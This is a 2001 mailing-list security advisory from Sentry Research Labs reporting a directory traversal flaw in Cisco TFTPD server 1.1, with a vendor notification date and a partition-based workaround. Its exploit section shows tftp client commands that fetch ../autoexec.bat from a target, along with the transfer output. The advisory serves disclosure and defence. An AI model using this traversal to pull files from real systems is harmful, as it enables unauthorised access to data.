Date: Mon, 18 Jun 2001 15:29:14 +0200
From: Siberian <siberian@splashpages.de.>
To: [email protected]Subject: Cisco TFTPD 1.1 Vulerablity
[Sentry Research Labs - ID0201061701]
(c) 2001 by www.sentry-labs.com
Note:
This advisory is for information and educational purpouse only! We
are not responsible for any abuse or damage resulting from these
information.
Author:
Siberian
Topic:
Security Bug in CISCO TFTPD server 1.1
Vendor Status:
Informed (06/17/01)
Vendor URL:
http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp
Preamble:
This software is some days old and I do not know if it is still supported,
but it is a serious issue which should be reported. The bug itself is very
common.
Issue:
TFTPD is vulnerable to some kind of primitve directory transversal
attack which allows a remote user to obtain any file from the target
system.
Exploit (using tftp client (Linux)):
tftp> connect target
tftp> get ../autoexec.bat
Recieved 218 bytes in 0.4 seconds
tftpd> quit
Workaround:
Install your base directory at another partition or Hardrive (not c:)
